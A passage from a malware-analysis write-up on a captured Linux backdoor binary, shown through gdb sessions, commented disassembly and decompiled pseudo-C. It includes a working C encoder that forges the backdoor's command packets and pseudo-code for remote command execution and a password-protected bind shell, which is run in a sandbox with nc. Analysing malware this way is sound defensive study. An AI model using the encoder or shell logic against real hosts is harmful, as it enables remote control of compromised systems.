(gdb) disassemble 0x080482fa 0x08048311 Dump of assembler code from 0x80482fa to 0x8048311: 0x80482fa: mov 0xffffbb20(%ebp),%edx 0x8048300: push %edx 0x8048301: mov 0xffffbb28(%ebp),%ecx 0x8048307: push %ecx 0x8048308: lea 0xffffffea(%esi),%eax 0x804830b: push %eax 0x804830c: call 0x804a1e8 End of assembler dump. (gdb) x/w (0xffffbb28+$ebp) 0xbfffb63c: 0xbffff32a (gdb) x/100hb 0xbffff32a 0xbffff32a: 0x16 0x17 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0xbffff332: 0x1e 0x1f 0x20 0x21 0x22 0x23 0x24 0x25 0xbffff33a: 0x26 0x27 0x28 0x29 0x2a 0x2b 0x2c 0x2d 0xbffff342: 0x2e 0x2f 0x30 0x31 0x32 0x33 0x34 0x35 0xbffff34a: 0x36 0x37 0x38 0x39 0x3a 0x3b 0x3c 0x3d 0xbffff352: 0x3e 0x3f 0x40 0x41 0x42 0x43 0x44 0x45 0xbffff35a: 0x46 0x47 0x48 0x49 0x4a 0x4b 0x4c 0x4d 0xbffff362: 0x4e 0x4f 0x50 0x51 0x52 0x53 0x54 0x55 0xbffff36a: 0x56 0x57 0x58 0x59 0x5a 0x5b 0x5c 0x5d 0xbffff372: 0x5e 0x5f 0x60 0x61 0x62 0x63 0x64 0x65 0xbffff37a: 0x66 0x67 0x68 0x69 0x6a 0x6b 0x6c 0x6d 0xbffff382: 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75 0xbffff38a: 0x76 0x77 0x78 0x79 (gdb) x/w (0xffffbb20+$ebp) 0xbfffb634: 0xbfffeb14 (gdb) x/100hb 0xbfffeb14 0xbfffeb14: 0xff 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb1c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb24: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb2c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb34: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb3c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb44: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb4c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb54: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb5c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb64: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb6c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xbfffeb74: 0xea 0xea 0xea 0xea (gdb)
As we expected we see that the first buffer is our prepared packet starting on the 16h position. The surprising result is that the second buffer comes back with a value of 255 (or -1) followed by all the bytes set to 234 (or -22).
If we repeat the test stopping the execution before the call we see that the second buffer is filled with 0's, while later on it has again the first byte with the 255 value followed by exactly 234 bytes set to 234.
This means that var_2ndBuf[1] equals 234, which obviously fails out of the range of valid options for the "case" statement. So we have to go through our next step.
We will need to disassemble the "decrypt_function" to know how do we have to "encrypt" the "packets" to send.
To do this we start with the assembly of the function with the variables renamed (as we did in our "main" function). We then go step by step adding comments on what we can see the assembly code is performing. This bring us to the following commented assembly code;
Decrypt_Packet proc near ; CODE XREF: main+1D8 var_10 = byte ptr -10h var_LocBuffPtr = dword ptr -4 arg_length = dword ptr 8 arg_source = dword ptr 0Ch arg_dest = dword ptr 10h push ebp mov ebp, esp sub esp, 4 push edi push esi push ebx mov edi, [ebp+arg_length] lea ebx, [edi-1] ; ebx = ArgSize-1 lea eax, [edi+3] ; eax = ArgSize+3 and al, 0FCh ; eax = ArgSize Rounded up to *4 sub esp, eax ; We allocate arg_size rounded ; bytes on the stack mov [ebp+var_LocBuffPtr], esp mov al, ds:gZero mov esi, [ebp+arg_dest] mov [esi], al ; dest[0=gZero test ebx, ebx jl EmptyBuffer ; if (ArgSize-1<0) goto ... repeat: ; CODE XREF: Decrypt_Packet+AD lea edx, [ebx-1] ; edx = ebx - 1 test ebx, ebx jz short last_char ; if (ebx==0) mov esi, [ebp+arg_source] movzx eax, byte ptr [ebx+esi] movzx edx, byte ptr [edx+esi] sub eax, edx ; eax = source[ebx-source[ebx-1 jmp short not_last_char ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ align 4 last_char: ; CODE XREF: Decrypt_Packet+31 mov esi, [ebp+arg_source] movzx eax, byte ptr [esi] ; eax=source[0 not_last_char: ; CODE XREF: Decrypt_Packet+40 lea ecx, [eax-17h] ; ecx = eax - 17h test ecx, ecx jge short more_thn_17 lea esi, [esi+0] weird_loop???: ; CODE XREF: Decrypt_Packet+5A add ecx, 100h js short weird_loop??? more_thn_17: ; CODE XREF: Decrypt_Packet+4F xor edx, edx cmp edx, edi ; cmp argSize,0 jge short none_left lea esi, [esi] for_loop: ; CODE XREF: Decrypt_Packet+73 mov esi, [ebp+arg_dest] mov al, [edx+esi] ; al=dest[edx mov esi, [ebp+var_LocBuffPtr] mov [edx+esi], al ; locBuf[dx=dest[dx inc edx cmp edx, edi ; for (dx=0;dx<di;dx++) ; locBuff[dx=Dest[dx jl short for_loop none_left: ; CODE XREF: Decrypt_Packet+60 mov esi, [ebp+arg_dest] mov [esi], cl ; dest[0=cl mov edx, 1 cmp edx, edi ; cmp edi,1 jge short one_left nop scndFor_loop: ; CODE XREF: Decrypt_Packet+94 mov esi, [ebp+var_LocBuffPtr] mov al, [edx+esi-1] mov esi, [ebp+arg_dest] mov [edx+esi], al ; dest[edx=locBuff[edx-1 inc edx cmp edx, edi ; for (edx=1;edx<edi;edx++) ; dest[edx=locBuf[edx-1 jl short scndFor_loop one_left: ; CODE XREF: Decrypt_Packet+81 mov esi, [ebp+var_LocBuffPtr] push esi push ecx push offset aCS ; "%c%s" mov esi, [ebp+arg_dest] push esi call asprintf___err___errx___fprintf___sprintf___sscanf___syslog add esp, 10h dec ebx jns repeat ; repeat until all processed EmptyBuffer: ; CODE XREF: Decrypt_Packet+26 lea esp, [ebp+var_10] pop ebx pop esi pop edi mov esp, ebp pop ebp retn Decrypt_Packet endp
Now that we have it all commented we try to transform to some kind of pseudo-C code to have a better view on what is done. We end up with something like this;
function Decrypt_packet (int size, char *source, char *dest) { char LocBuff[2048]; //"Dynamically" allocated in the buffer char *LocBuffPtr; int index; LocBuffPtr = LocBuff; dest[0] = Global3 index = ArgSize - 1; while (index>=0) { if (index==0) ch = source[0]; else ch = source[index] - source[index-1]; ch = ch - 17h; for (tmp=0;tmp<argSize;tmp++) locbuff[tmp]=dest[tmp]; dest[0]=ch; for (tmp=1;tmp<argSize;tmp++) dest[tmp]=locbuff[tmp-1]; sprintf ( dest, "%c%s", ch, locbuff ); index--; } }
Now we can see that the algorithm is an extremely inefficient (and quiet difficult to reverse-engineer) version of the next algorithm;
function Decrypt_packet (size int, source *char, dest *char) { index int; dest[0]=source[0] - 17h; for (index=1; index < size; index ++) { dest[index] = source[index] - source[index-1] - 17h; } }
If we see what's the result of Decrypt_packet() applied to our "test" packet, we see inmediatelly that the result is the one we had. The fact that each byte is substituted by the difference with the previous minus 17h is the reason why we got all those "234" values; the difference was always 1, and 1-17h=-16h, which on a byte is represented as EAh (100h-16h) or 234.
The fact that the algorithm was so strangely codified makes us think that it is possible that it was written in such a strange way just to try to prevent reverse-engineering. The other option is that the programmer wasn't good at programming and he/she was just a "script kiddy", but given the advanced topics covered on this binary and the coding of the rest of the application, this option doesn't seem probable.
So now we know how the decryption process works. So we can now work on preparing our new "packet" to be delivered in a way that it goes through all the tests and jumps to the "case" statement that we want!
To do that we prepare a simple program that prepares a "packet" with one "command" or "case value" to jump to.
#include <unistd.h> #include <stdlib.h> char header[0x17]={1,2,3,4,5,6,7,8,9,0xb,11,12,13,14,15,16, 17,18,19,20,0x2,22,00}; //includes 1st data byte int main(int argc, char** argv) { char ch,prev; char command; command = atoi(argv[1]); //Write header write(1,header,sizeof(header)); //Write "encoded" Command ch = command + 0x17; write(1,&ch,1); prev = ch; //Write encoded data while (read(0,&ch,1)) { ch = prev + ch + 0x17; write(1,&ch,1); prev = ch; } return(0); }
Now we can prepare a "command-packet" using a "payload" file named 256bytes.dat consisting of the values from 0 to FFh consecutively;
[tstusr@sandbox reverse]$ gcc -Wall -o encrypt encrypt.c [tstusr@sandbox reverse]$ ./encrypt 1 <256bytes.dat >command1.pkt
We can try now with gdb to check if everything goes fine. We'll try with this "command1.pak" to see if we really jump to the "case 1". For that we start gdb and set a breakpoint just after the "movzx eax,[ebp+var_2ndBuf+1]" and we check if eax has a value of "1".
[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)... (gdb) break *0x804831b Breakpoint 1 at 0x804831b (gdb) run < command1.pkt Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1.pkt warning: shared library handler failed to enable breakpoint Breakpoint 1, 0x0804831b in ?? () (gdb) info registers eax eax 0x1 1 (gdb)
We can also check that our 256 bytes of payload have arrived perfectly;
(gdb) x/258hb 0xbfffeb14 0xbfffeb14: 0xe9 0x01 0x00 0x01 0x02 0x03 0x04 0x05 0xbfffeb1c: 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0xbfffeb24: 0x0e 0x0f 0x10 0x11 0x12 0x13 0x14 0x15 0xbfffeb2c: 0x16 0x17 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0xbfffeb34: 0x1e 0x1f 0x20 0x21 0x22 0x23 0x24 0x25 0xbfffeb3c: 0x26 0x27 0x28 0x29 0x2a 0x2b 0x2c 0x2d 0xbfffeb44: 0x2e 0x2f 0x30 0x31 0x32 0x33 0x34 0x35 0xbfffeb4c: 0x36 0x37 0x38 0x39 0x3a 0x3b 0x3c 0x3d 0xbfffeb54: 0x3e 0x3f 0x40 0x41 0x42 0x43 0x44 0x45 0xbfffeb5c: 0x46 0x47 0x48 0x49 0x4a 0x4b 0x4c 0x4d 0xbfffeb64: 0x4e 0x4f 0x50 0x51 0x52 0x53 0x54 0x55 0xbfffeb6c: 0x56 0x57 0x58 0x59 0x5a 0x5b 0x5c 0x5d 0xbfffeb74: 0x5e 0x5f 0x60 0x61 0x62 0x63 0x64 0x65 0xbfffeb7c: 0x66 0x67 0x68 0x69 0x6a 0x6b 0x6c 0x6d 0xbfffeb84: 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75 0xbfffeb8c: 0x76 0x77 0x78 0x79 0x7a 0x7b 0x7c 0x7d 0xbfffeb94: 0x7e 0x7f 0x80 0x81 0x82 0x83 0x84 0x85 0xbfffeb9c: 0x86 0x87 0x88 0x89 0x8a 0x8b 0x8c 0x8d 0xbfffeba4: 0x8e 0x8f 0x90 0x91 0x92 0x93 0x94 0x95 0xbfffebac: 0x96 0x97 0x98 0x99 0x9a 0x9b 0x9c 0x9d 0xbfffebb4: 0x9e 0x9f 0xa0 0xa1 0xa2 0xa3 0xa4 0xa5 0xbfffebbc: 0xa6 0xa7 0xa8 0xa9 0xaa 0xab 0xac 0xad 0xbfffebc4: 0xae 0xaf 0xb0 0xb1 0xb2 0xb3 0xb4 0xb5 0xbfffebcc: 0xb6 0xb7 0xb8 0xb9 0xba 0xbb 0xbc 0xbd 0xbfffebd4: 0xbe 0xbf 0xc0 0xc1 0xc2 0xc3 0xc4 0xc5 0xbfffebdc: 0xc6 0xc7 0xc8 0xc9 0xca 0xcb 0xcc 0xcd 0xbfffebe4: 0xce 0xcf 0xd0 0xd1 0xd2 0xd3 0xd4 0xd5 0xbfffebec: 0xd6 0xd7 0xd8 0xd9 0xda 0xdb 0xdc 0xdd 0xbfffebf4: 0xde 0xdf 0xe0 0xe1 0xe2 0xe3 0xe4 0xe5 0xbfffebfc: 0xe6 0xe7 0xe8 0xe9 0xea 0xeb 0xec 0xed 0xbfffec04: 0xee 0xef 0xf0 0xf1 0xf2 0xf3 0xf4 0xf5 0xbfffec0c: 0xf6 0xf7 0xf8 0xf9 0xfa 0xfb 0xfc 0xfd 0xbfffec14: 0xfe 0xff
The first byte is the last 00 that we had on the "header" of our application, and the second is the command itself. After that come our 256 bytes exactly as we had them before going through our "encrypt" program.
We can also provide the binary with more than one packet. We have to consider the fact that our "recv" will in fact read at most 2048 bytes of stdin. So if we want to provide more than 1 packet we just have to make sure that all the packets are 2048 bytes in length (except the last that can be any size).
We will do it by preparing an input file with one "command 1" and one "command 2" pakets.
[tstusr@sandbox reverse]$ ./encrypt 2 <256bytes.dat >command2.pkt [tstusr@sandbox reverse]$ cp command1.pkt command1.2048.pkt [tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command1.2048.pkt [tstusr@sandbox reverse]$ cp command2.pkt command2.2048.pkt [tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command2.2048.pkt [tstusr@sandbox reverse]$ ls -l command?.2048.pkt -rw-rw-r-- 1 tstusr tstusr 2048 May 30 01:25 command1.2048.pkt -rw-rw-r-- 1 tstusr tstusr 2048 May 30 01:25 command2.2048.pkt [tstusr@sandbox reverse]$ cat command1.2048.pkt command2.2048.pkt > command1-2.pkt
Now we can test that effectively we read two packets and that both "jump" to their corresponding "case" statement with gdb;
[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)... (gdb) break *0x804831b Breakpoint 1 at 0x804831b (gdb) run < command1-2.pkt Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1-2.pkt warning: shared library handler failed to enable breakpoint Breakpoint 1, 0x0804831b in ?? () (gdb) info registers eax eax 0x1 1 (gdb) cont Continuing. Breakpoint 1, 0x0804831b in ?? () (gdb) info registers eax eax 0x2 2 (gdb)
All good! We have checked that BOTH pakets have been read and the "command" has arrived to its destination. The question that arises now is; what has happened inside the "case 1"? And what would happen if we instruct gdb to "cont" again?
Once thing worth mentioning here is that while doing all this tests we've had our sniffer up and running all the time and it hasn't registered any activity coming from the binary.
Its time to find out its capabilities.
To do this we will proceed in a similar way we did to reverse-engineer the decryption packet. Starting from an assembler code with as many variables identified as possible and with as many comments as possible to try to end up with a Pseudo-C code that allows us to understand what the 12 "cases" or "commands" do. The result is as follows;
case1: var_Buf.hdr.ihl_version = 0; var_Buf.hdr.ihl_version = gDouble1; var_Buf.hdr.TOS = 1; var_Buf.hdr.len = 7; if (gPID2 == 0) var_Buf.hdr.len+1 = 0; else { var_Buf.hdr.len+1 = 1; var_Buf.hdr.id = g_LastCommand; } Encrypt_Packet (400, &var_Buf, &var_2ndBuf); fun1 ( var_AddrPtr, &var_2ndBuf, 400 + (rand??_caller() mod 201)); break; case2: gWord2_0_or_2 = var_2ndBuf[2]; gbdaddr = var_Buf.hdr.daddr; randomize??(time(0)); esi=0; edi=rand??_caller mod 10; for (ebx=0; ebx<=9; ebx++) { if (ebx!=edi) { if (gWord2_0_or_2 == 2) { var_Addr[esi..esi+3]=var_2ndBuf[ebx*4+3..ebx*4+6] } else { var_Addr[esi..esi+3]=byte(SOMEWEIRDRANDOMVALUE); }//if (gWord2_0_or_2==2) } //if (ebx!=edi) esi +=4 ; } if (gWord2_0_or_2 != 2) { if (gWord2_0_or_2 != 0) edi=0; edi = edi*4; var_0Value? = edi; var_Addr[edi] = var_2ndBuf[3..6]; } break; //Fills the "var_Addr[10]" array. It's an array of 10 addresses //If gWord2_0_or_2 == 2 it gets everything from the 2ndBuf, except one of the addresses that's left intact //If gWord2_0_or_2 == 0 it fills everything with random values except the "random hole" of the array with the first value passed on 2ndBuf[3..6] //If gWord2_0_or_2 == other it fill everything with random values except the first value, which is set to the first value passed on 2ndBuf[3..6] case3: gPID = fork(); if (gPID==0) {//child setsid() signal(sigChild,1); if (fork()!=0) { //parent sleep(10); kill (gpid, SIGKILL); //???? Does it kill anyone??? gpid=0!!! _called_to_exit(0); } for (ebx=0;ebx<398;ebx++) Buf2[ebx]=Buf2[ebx+2]; sprintf(Buffer, "/bin/csh -f -c "%s" 1> %s 2>&1",Buf2, "/tmp/.hj237349"); EXECUTES IT OPEN (tmp) while READS tmp file Encripts FUN1_sends it to (var_AddrPtr, 44E8Buffer, (rand()mod 201) +400); endwhile; exit(0); }; break; case4: if (gPID2==0) { gLastCommand = 4; gPID2 = fork(); if (gPID2==0) { var_buf256Bytes[0..255]=var_Buf2[0..255]; var_buf256Bytes[0..255]=var_buf256Bytes[0+9..255+9]; Loc_Fun_4 ( var_Buf2[2,3,4,5],0,var_Buf2[6,7,8],&var_buf256Bytes); //gPID2=0 in Loc_Fun_4 exit(0); } } case5: if (gPID2==0) { gLastCommand = 5; gPID2 = fork(); if (gPID2==0) { var_Buf256Bytes[0..255]=Buf2[0..255]; var_Buf256Bytes[0..255]=var_Buf256Bytes[0+13..255+13]; Loc_Fun_6 ( var_Buf2[2,3,4,5,6,7,8,9,10,11,12,&var_buf256Bytes); //gPID2=0 inside Loc_Fun_6 exit(0); } } case6: if (gpid2==0) { gLastCommand = 6; signal(SIGCHLD,SIG_IGN); gPID2=fork(); if (gPID2==0) { setsid(); signal(SIGCHLD,SIG_IGN); var_bindSockAddr.sin_family = AF_INET; var_bindSockAddr.s_addr=0F15Ah; var_bindSockAddr.s_addr+2=0 var_setsockopt_optval=1 var_SD = socket (AF_INET,SOCKSTREAM,0); signal (SIGCHLD,SIG_IGN); signal (SIGCHLD,SIG_IGN); signal (SIG_HUP,SIG_IGN); setsockopt(var_mainSD, SOL_SOCKET, SO_REUSEADDR,&var_setsockopt_optval); bind(var_SD,&var_bindSockAddr,16); listen(var_SD,3); do { var_FD = accept(var_SD,&var_AcceptSockAddr, &var_AcceptAddrLen); if (var_FD==0) exit(0); } while(fork()==0); recv (var_FD, &var_TCPRecvBuf,19,0); for (bx=0;bx<=18;bx++) do { if (var_TCPRecvBuf[bx]==(LineFeed|CR)) var_TCPRecvBuf[bx]=0; else var_TCPRecvBuf[bx]++; if (var_TCPRecvBuf!="TfOjG") { send(var_FD,gPwdFailedRespo,4,0); close(var_FD); exit(1); } dup2(var_FD,0); dup2(var_FD,1); dup2(var_FD,2); setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.",1); unsetenv("HISTFILE"); setenv("TERM","linux",1); execl("/bin/sh","sh",0); close(var_FD); exit(0); } }; break; case7: gPID = fork(); if (gPID==0) { setsid() signal(SIGCHLD,1); if (fork()!=0) {sleep???(1200);kill(SIGKILL,gPID);exit(0);}//1200=20min for(ebx=0;ebx<=397;ebx++) var_Buf2[ebx]=var_Buf2[ebx+2]; sprintf(&Buffer, "/bin/csh -f -c "%s" ",Buf2Ptr); ??execv??(&Buffer); exit(0); } break; case8: if (gPID2!=0) { kill(gPID2,SIGKILL); gPID2 = 0; } break; case9: if (gPID2==0) { g_LastCommand = 9; gPID2==fork() if (gPID2!=0) { var_Buf256Bytes[0..255]=Buf2[0..255]; var_Buf256Bytes[0..255]=var_Buf256Bytes[0+10..255+10]; Fun4(buf2[2,3,4,5,6,7,8,9],&var_Buf256Bytes); exit(0); } } break; case10: if (gPID2==0) { g_LastCommand = 9; gPID2==fork() if (gPID2!=0) { var_Buf256Bytes[0..255]=Buf2[0..255]; var_Buf256Bytes[0..255]=var_Buf256Bytes[0+14..255+14]; Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12],0,buf2[13],&var_Buf256Bytes); exit(0); } } break; case11: if (gPID2==0) { g_LastCommand = 11; gPID2==fork() if (gPID2!=0) { var_Buf256Bytes[0..255]=Buf2[0..255]; var_Buf256Bytes[0..255]=var_Buf256Bytes[0+15..255+15]; Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12,13,14],&var_Buf256Bytes); exit(0); } } break; case 12: if (gPID2==0) { g_LastCommand = 12; gPID2==fork() if (gPID2!=0) { var_256Bytes[0..255]=Buf2[0..255]; var_256Bytes[0..255]=var_256Bytes[0+14..255+14]; Fun5(buf2[2,3,4,5,6,7,8,9,10,11,12,13],&var_256Bytes); exit(0); } } break;
We can see that there are several calls to function defined nearby (named FunN or LocFunN). We'll have to work a little bit on them. Here's a quick description of the functionality they provide;
With all that we can see part of the functionality that this "cases" provide;
This produces an output of an "encrypted" version of /etc/services on the server
./encrypt 3 < catservices.dat >command3.catservices.pkt cat command2.2048.pak command3.catservices.pkt > command2-3.catservices.pkt
Note: After this test there will be 2 processes "[mingetty]" running. We'll have to SIGKILL both.
[tstusr@sandbox reverse]$ ./encrypt 6 <256bytes.dat >command6.pkt [tstusr@sandbox reverse]$ cat command2.2048.pkt command6.pkt > command2-6.pkt [tstusr@sandbox reverse]$ ./the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command2-6.pkt & [1] 1792 [tstusr@sandbox reverse]$ nc 127.0.0.1 23281 SeNiF pwd / uname -a Linux sandbox 2.4.2-2 #1 Sun Apr 8 19:37:14 EDT 2001 i586 unknown